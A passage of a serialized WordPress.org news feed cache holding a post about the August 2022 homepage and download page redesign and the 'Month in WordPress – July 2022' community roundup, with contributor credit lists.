href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>,&nbsp;<a href=\"https://profiles.wordpress.org/sabernhardt/\">Stephen Bernhardt</a>,&nbsp;<a href=\"https://profiles.wordpress.org/tykoted/\">Teddy Patriarca</a>,&nbsp;<a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>,&nbsp;<a href=\"https://profiles.wordpress.org/tommusrhodus/\">tommusrhodus</a>,&nbsp;<a href=\"https://profiles.wordpress.org/shimotomoki/\">Tomoki Shimomura</a>, <a href=\"https://profiles.wordpress.org/hellofromtonya/\">Tonya Mork</a>,&nbsp;<a href=\"https://profiles.wordpress.org/webcommsat/\">webcommsat AbhaNonStopNewsUK</a>, and&nbsp;<a href=\"https://profiles.wordpress.org/zieladam/\">zieladam</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13346\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"A New WordPress.org Homepage and Download Page\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://wordpress.org/news/2022/08/a-new-wordpress-org-homepage-and-download-page/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 15 Aug 2022 15:34:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:6:\"Design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"Meta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13321\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:350:\"The WordPress experience has significantly evolved in the past few years. In order to highlight the power of WordPress on WordPress.org, the last few weeks have seen a homepage and download page redesign kickoff and shared mockups. Today, these new designs are going live! Like the News pages before them, these refreshed pages are inspired [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Nicholas Garofalo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8395:\"\n<p>The WordPress experience has significantly evolved in the past few years. In order to highlight the power of WordPress on WordPress.org, the last few weeks have seen a homepage and download page <a href=\"https://make.wordpress.org/design/2022/07/08/project-kickoff-wordpress-org-homepage-and-download-page-redesign/\">redesign kickoff</a> and <a href=\"https://make.wordpress.org/design/2022/07/27/project-update-wordpress-org-homepage-and-download-page-mockups/\">shared mockups</a>. Today, these new designs are going live! Like <a href=\"https://wordpress.org/news/2022/02/a-new-wordpress-news/\">the News pages before them</a>, these refreshed pages are inspired by the jazzy look &amp; feel WordPress is known for.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"599\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/08/Featured-Image.png?resize=1024%2C599&#038;ssl=1\" alt=\"\" class=\"wp-image-13327\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/08/Featured-Image.png?resize=1024%2C599&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2022/08/Featured-Image.png?resize=300%2C175&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2022/08/Featured-Image.png?resize=768%2C449&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2022/08/Featured-Image.png?resize=1536%2C898&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2022/08/Featured-Image.png?w=1710&amp;ssl=1 1710w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>The <a href=\"https://wordpress.org/\">new homepage</a> brings more attention to the benefits and experience of using WordPress, while also highlighting the community and resources to get started. </p>\n\n\n\n<p>The <a href=\"https://wordpress.org/download/\">new download page</a> greets visitors with a new layout that makes getting started with WordPress even easier by presenting both the download and hosting options right at the top.</p>\n\n\n\n<p>This redesign was made possible through great collaboration between Design, Marketing, and Meta teams. Thank you to everyone involved throughout this update:</p>\n\n\n\n<p class=\"is-style-wporg-props-long\"><a href=\'https://profiles.wordpress.org/abuzon/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>abuzon</a> <a href=\'https://profiles.wordpress.org/adamwood/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>adamwood</a> <a href=\'https://profiles.wordpress.org/adeebmalik/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>adeebmalik</a> <a href=\'https://profiles.wordpress.org/alexandreb3/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>alexandreb3</a> <a href=\'https://profiles.wordpress.org/alipawp/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>alipawp</a> <a href=\'https://profiles.wordpress.org/angelasjin/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>angelasjin</a> <a href=\'https://profiles.wordpress.org/aniash_29/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>aniash_29</a> <a href=\'https://profiles.wordpress.org/annezazu/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>annezazu</a> <a href=\'https://profiles.wordpress.org/beafialho/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>beafialho</a> <a href=\'https://profiles.wordpress.org/bjmcsherry/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>bjmcsherry</a> <a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a> <a href=\'https://profiles.wordpress.org/colinchadwick/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>colinchadwick</a> <a href=\'https://profiles.wordpress.org/crevilaro/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>crevilaro</a> <a href=\'https://profiles.wordpress.org/critterverse/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>critterverse</a> <a href=\'https://profiles.wordpress.org/dansoschin/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>dansoschin</a> <a href=\'https://profiles.wordpress.org/dd32/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>dd32</a> <a href=\'https://profiles.wordpress.org/dufresnesteven/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>dufresnesteven</a> <a href=\'https://profiles.wordpress.org/eboxnet/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>eboxnet</a> <a href=\'https://profiles.wordpress.org/eidolonnight/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>eidolonnight</a> <a href=\'https://profiles.wordpress.org/elmastudio/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>elmastudio</a> <a href=\'https://profiles.wordpress.org/fernandot/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>fernandot</a> <a href=\'https://profiles.wordpress.org/geoffgraham/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>geoffgraham</a> <a href=\'https://profiles.wordpress.org/iandunn/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>iandunn</a> <a href=\'https://profiles.wordpress.org/javiarce/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>javiarce</a> <a href=\'https://profiles.wordpress.org/joedolson/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>joedolson</a> <a href=\'https://profiles.wordpress.org/jpantani/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jpantani</a> <a href=\'https://profiles.wordpress.org/kellychoffman/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>kellychoffman</a> <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a> <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> <a href=\'https://profiles.wordpress.org/matt/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>matt</a> <a href=\'https://profiles.wordpress.org/maurodf/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>maurodf</a> <a href=\'https://profiles.wordpress.org/melchoyce/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>melchoyce</a> <a href=\'https://profiles.wordpress.org/mikachan/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mikachan</a> <a href=\'https://profiles.wordpress.org/nikhilgandal/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>nikhilgandal</a> <a href=\'https://profiles.wordpress.org/pablohoneyhoney/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>pablohoneyhoney</a> <a href=\'https://profiles.wordpress.org/peakzebra/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>peakzebra</a> <a href=\'https://profiles.wordpress.org/poliuk/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>poliuk</a> <a href=\'https://profiles.wordpress.org/priethor/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>priethor</a> <a href=\'https://profiles.wordpress.org/psmits1567/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>psmits1567</a> <a href=\'https://profiles.wordpress.org/renyot/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>renyot</a> <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a> <a href=\'https://profiles.wordpress.org/ryelle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>ryelle</a> <a href=\'https://profiles.wordpress.org/santanainniss/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>santanainniss</a> <a href=\'https://profiles.wordpress.org/sereedmedia/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sereedmedia</a> <a href=\'https://profiles.wordpress.org/sippis/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sippis</a> <a href=\'https://profiles.wordpress.org/tellyworth/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>tellyworth</a> <a href=\'https://profiles.wordpress.org/tobifjellner/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>tobifjellner</a> <a href=\'https://profiles.wordpress.org/webdados/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webdados</a> <a href=\'https://profiles.wordpress.org/willmot/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>willmot</a></p>\n\n\n\n<p>Your comments, including some <a href=\"https://make.wordpress.org/meta/2016/12/12/new-homepage-redesign/\">feedback from the 2016 redesign</a>, were taken into consideration with this work. Expect more updates to come as efforts to jazz up WordPress.org continue.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"The Month in WordPress – July 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2022/08/the-month-in-wordpress-july-2022/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 05 Aug 2022 08:57:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13306\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:362:\"July 2022 brought a lot of exciting announcements and proposals for the WordPress project, from an updated timeline for the WordPress 6.1 release, to design updates on WordPress.org. Read on to learn more about the latest news from the community. WordPress 6.1 development cycle is now published Mark your calendars! The WordPress 6.1 development cycle [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:15049:\"\n<p>July 2022 brought a lot of exciting announcements and proposals for the WordPress project, from an updated timeline for the WordPress 6.1 release, to design updates on WordPress.org. Read on to learn more about the latest news from the community.</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<h2>WordPress 6.1 development cycle is now published</h2>\n\n\n\n<p>Mark your calendars! The <a href=\"https://make.wordpress.org/core/6-1/\">WordPress 6.1 development cycle</a> has been published along with its release team. The <strong>expected release date</strong> has been updated to <a href=\"https://make.wordpress.org/core/2022/07/26/wordpress-6-1-planning-roundup-v2/\"><strong>November 1, 2022</strong></a>, to incorporate feedback received on the first proposed schedule.</p>\n\n\n\n<p>In the meantime, you can upgrade WordPress to version 6.0.1. This maintenance release became <a href=\"https://wordpress.org/news/2022/07/wordpress-6-0-1-maintenance-release/\">available for download</a> on July 12, 2022, and includes several updates since WordPress 6.0 in May 2022.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Want to get more involved with WordPress? Join Executive Director Josepha Haden Chomphosy, as she guides you through the five stages of contribution in a <a href=\"https://wordpress.org/news/2022/07/episode-36-beginners-guide-to-contributions-2-0/\">recent episode of WP Briefing</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>A new look for the WordPress Homepage and Download page</h2>\n\n\n\n<p>Following the revamp of <a href=\"https://wordpress.org/news/\">WordPress.org/News</a> and the <a href=\"https://wordpress.org/gutenberg/\">Gutenberg page</a>, further design updates are coming to WordPress.org to create a fresh and modern user experience that reflects the future of WordPress.</p>\n\n\n\n<p>The WordPress.org home and download pages will be the next pieces to get a refreshed look and feel. The redesign project <a href=\"https://make.wordpress.org/design/2022/07/08/project-kickoff-wordpress-org-homepage-and-download-page-redesign/\">kicked off</a> on July 8, 2022, and the <a href=\"https://make.wordpress.org/meta/2022/08/01/developing-the-redesigned-home-and-download-pages/\">development work</a> is already underway.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Take a look at the design mockups and <a href=\"https://make.wordpress.org/design/2022/07/27/project-update-wordpress-org-homepage-and-download-page-mockups/\">join the conversation</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Gutenberg versions 13.6, 13.7, and 13.8 are here</h2>\n\n\n\n<p>Three new versions of Gutenberg have been released since last month’s edition of The Month in WordPress:</p>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\"><strong>Gutenberg 13.6</strong></a> shipped on July 6, 2022. It includes 26 bug fixes and accessibility enhancements. This release also builds on previous work to expand theme.json and to allow you to create a cohesive design across blocks.</li><li><a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\"><strong>Gutenberg 13.7</strong></a> brings an updated modal design, the ability to apply block locking to inner blocks, and <a href=\"https://make.wordpress.org/core/2022/07/21/core-editor-improvement-deeper-customization-with-more-template-options/\">new template types</a>, to name a few highlights. It was released on July 20, 2022.</li><li>The latest Gutenberg release, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\"><strong>version 13.8</strong></a>, went live on August 3, 2022. It comes with ​​fluid typography support among other enhancements, a new feature that will allow you to define text size that can scale and adapt to changes in screen size.</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Follow the <a href=\"https://make.wordpress.org/core/tag/gutenberg-new/\">“What’s new in Gutenberg”</a> posts to stay on top of the latest updates.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Team updates: WordPress mobile app changes, pattern previews, Five for the Future improvements</h2>\n\n\n\n<ul><li>The Mobile Team announced last week that it will be <a href=\"https://make.wordpress.org/mobile/2022/07/27/refocusing-the-wordpress-app-on-core-features/\">refocusing the WordPress mobile app on core features</a>. To better serve the needs of all app users and reduce confusion, the Jetpack and WordPress.com features will be moved to a separate app in a gradual process targeted for completion later this year.</li><li>The Community Team is<a href=\"https://make.wordpress.org/community/2022/07/08/call-for-supporters-reactivating-wordpress-meetups-around-the-world/\"> looking for supporters</a> to help reactivate WordPress meetups around the world.</li><li>As part of the ongoing efforts to improve the <a href=\"https://wordpress.org/five-for-the-future/\">Five for the Future</a> (5ftF) initiative, the Meta Team added automated recognition for a number of non-code contributions. <a href=\"https://make.wordpress.org/project/2022/07/28/updates-on-the-five-for-the-future-program-and-proposed-improvements/\">Check out this post</a> to learn more about other proposed improvements to the program.</li><li>The WordPress.org Theme Directory introduced a new feature that allows visitors to <a href=\"https://make.wordpress.org/meta/2022/07/21/pattern-previews-for-themes-in-the-directory-beta/\">preview patterns bundled in a theme</a> without requiring installation.</li><li>The Design Team proposed to release <a href=\"https://make.wordpress.org/design/2022/07/19/proposal-a-new-kind-of-default-theme/\">a curated set of style variations</a> designed by the community (instead of a new default theme) for WordPress 6.1.</li><li>Josepha Haden Chomphosy reflected on progress towards the 2022 goals of the WordPress project in this <a href=\"https://make.wordpress.org/updates/2022/07/25/a-mid-year-year-look-at-2022-goals/\">mid-year review</a>.</li><li>Over the past few months, the Training Team published six tutorials along with a variety of lesson plans and online workshops. See what&#8217;s new in this <a href=\"https://make.wordpress.org/updates/2022/07/15/whats-new-on-learnwp-in-july-2022/\">summary post</a>.</li><li>Curious about how the WordPress 6.0 release process went? Read this <a href=\"https://make.wordpress.org/core/2022/07/07/wordpress-6-0-retrospective-recap/\">WordPress 6.0 retrospective recap</a> for insights.</li><li>The Themes Team shared a follow-up post to address questions about the <a href=\"https://make.wordpress.org/themes/2022/07/28/using-locally-hosted-google-fonts-in-themes/\">use of locally-hosted Google fonts in themes</a>.</li><li>There is an open <a href=\"https://make.wordpress.org/accessibility/2022/07/15/call-team-rep-nomination-july-2022/\">call for a new Accessibility Team Representative</a>.</li><li>The Performance Team has a new dedicated Make blog. Follow updates on their work and proposals at <a href=\"https://make.wordpress.org/performance\">make.wordpress.org/performance</a>.</li><li>The July 2022 edition of the <a href=\"https://make.wordpress.org/polyglots/2022/07/22/polyglots-monthly-newsletter-july-2022/\">Polyglots Monthly Newsletter</a> is live.</li><li>The latest edition of People of WordPress highlights <a href=\"https://wordpress.org/news/2022/07/people-of-wordpress-carla-doria/\">Carla Doria</a>, a customer support specialist from South America.</li><li><a href=\"https://make.wordpress.org/community/2022/07/22/july-meetup-organizer-newsletter/\">July’s Meetup Organizer Newsletter</a> features several tips and tools for engaging and growing your community.</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>WP Briefing celebrated <a href=\"https://wordpress.org/news/2022/08/episode-37-the-world-of-wordpress-on-world-wide-web-day/\">World Wide Web Day 2022 with a special episode</a>!<strong> </strong>Tune in to hear contributors from the community reflect on how WordPress impacts their world.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Feedback &amp; testing requests</h2>\n\n\n\n<ul><li>Josepha Haden Chomphosy suggested giving Full Site Editing (FSE) a more user-friendly name. <a href=\"https://make.wordpress.org/core/2022/07/27/giving-fse-a-more-user-friendly-name/\">Share your thoughts in this post</a>.</li><li>The <a href=\"https://make.wordpress.org/core/2022/07/21/request-for-feedback-feature-notifications-proof-of-concept/\">WordPress Notifications Feature project</a> is ready to begin collecting feedback. Efforts to help test the feature plugin and comments are welcome.</li><li>The Training Team kicked off a discussion to gather feedback on <a href=\"https://make.wordpress.org/training/2022/07/11/exploring-wordpress-certifications/\">how WordPress certifications should be approached</a>.</li><li>The Performance Team shared a few proposals to integrate new features targeting the WordPress 6.1 release. You can help by testing, reporting bugs, or contributing fixes and ideas:<ul><li><a href=\"https://make.wordpress.org/core/2022/07/13/proposal-persistent-object-cache-and-full-page-cache-site-health-checks/\">Proposal: Persistent Object Cache and Full Page Cache Site Health Checks</a></li><li><a href=\"https://make.wordpress.org/core/2022/07/21/proposal-add-a-dominant-color-background-to-images/\">Proposal: Add a dominant color background to images</a></li></ul></li><li>Version 20.4 of WordPress for <a href=\"https://make.wordpress.org/mobile/2022/07/26/call-for-testing-wordpress-for-android-20-4/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2022/07/25/call-for-testing-wordpress-for-ios-20-4/\">iOS</a> is available for testing.</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>The Community Team is calling on all meetup members and organizers to <a href=\"https://make.wordpress.org/community/2022/08/02/announcing-the-2021-2022-annual-meetup-survey/\">complete the 2021-2022 Annual Meetup Survey</a>. Your feedback will help strengthen the WordPress meetup program for years to come. Please respond and help spread the word.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>WordCamp updates</h2>\n\n\n\n<ul><li>WordCamp US is only five weeks away! The organizing team announced the <a href=\"https://us.wordcamp.org/2022/2022-kim-parsell-memorial-scholarship-recipients/\">Kim Parsell Memorial Scholarship recipients</a> for this year. Congratulations to <a href=\"https://profiles.wordpress.org/margheweb/\">Margherita Pelonara</a>, <a href=\"https://profiles.wordpress.org/simo70/\">Simona Simionato</a>, and <a href=\"https://profiles.wordpress.org/webtechpooja/\">Pooja Derashri</a>!</li><li><a href=\"https://us.wordcamp.org/2022/underrepresented-speaker-supporters/\">20 organizations</a> have stepped forward to support underrepresented speakers from all over the world to get to WordCamp US 2022. Visit the <a href=\"https://us.wordcamp.org/2022/underrepresented-speaker-support/\">Underrepresented Speaker Support page</a> to donate to the fund or ask for support if you are part of an underrepresented group.</li><li>WordCamp Asia 2023 opened a new <a href=\"https://asia.wordcamp.org/2023/call-for-speakers-is-now-open/\">Call for Speakers</a> and <a href=\"https://asia.wordcamp.org/2023/call-for-media-partners/\">Media Partners</a>. The deadline for speaker applications is September 15, 2022. The organizing team also shared more details on the <a href=\"https://asia.wordcamp.org/2023/wordcamp-asia-2023-ticket-release-timeline/\">ticket release timeline</a>.</li><li>Don’t miss these upcoming WordCamps:<ul><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1fa-1f1ec.png\" alt=\"🇺🇬\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://jinja.wordcamp.org/2022/\">WordCamp Jinja</a>, Uganda on September 2-3, 2022</li><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1f3-1f1f5.png\" alt=\"🇳🇵\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://kathmandu.wordcamp.org/2022/\">WordCamp Kathmandu</a>, Nepal on September 3-4, 2022</li><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1fa-1f1f8.png\" alt=\"🇺🇸\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://us.wordcamp.org/2022/\">WordCamp US</a> in San Diego, California on September 9-11, 2022</li><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1f3-1f1f1.png\" alt=\"🇳🇱\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://netherlands.wordcamp.org/2022/\">WordCamp Netherlands</a>, The Netherlands on September 15-16, 2022</li><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1ea-1f1f8.png\" alt=\"🇪🇸\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://pontevedra.wordcamp.org/2022/\">WordCamp Pontevedra</a>, Spain on September 24-25, 2022</li></ul></li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Join #WPDiversity with a free, online speaker workshop for Indian women in the WordPress community. The event will take place on September 24-25, 2022. <a href=\"https://www.eventbrite.com/e/speaker-workshop-for-indian-women-in-the-wordpress-community-sept-24-25-tickets-348466712317\">Sign up now</a>!</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<p><strong><em><strong><em><strong><em>Have a story that we should include in the next issue of The Month in WordPress? Let us know by filling out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this form</em></strong></a><strong><em>.</em></strong></em></strong></em></strong></p>\n\n\n\n<p><em><em>The following folks contributed to this edition of The Month in WordPress: <a href=\'https://profiles.wordpress.org/chaion07/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chaion07</a>, <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a>, <a href=\'https://profiles.wordpress.org/mysweetcate/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mysweetcate</a>, <a href=\'https://profiles.wordpress.org/sereedmedia/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sereedmedia</a>, <a href=\'https://profiles.wordpress.org/dansoschin/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>dansoschin</a>, <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span 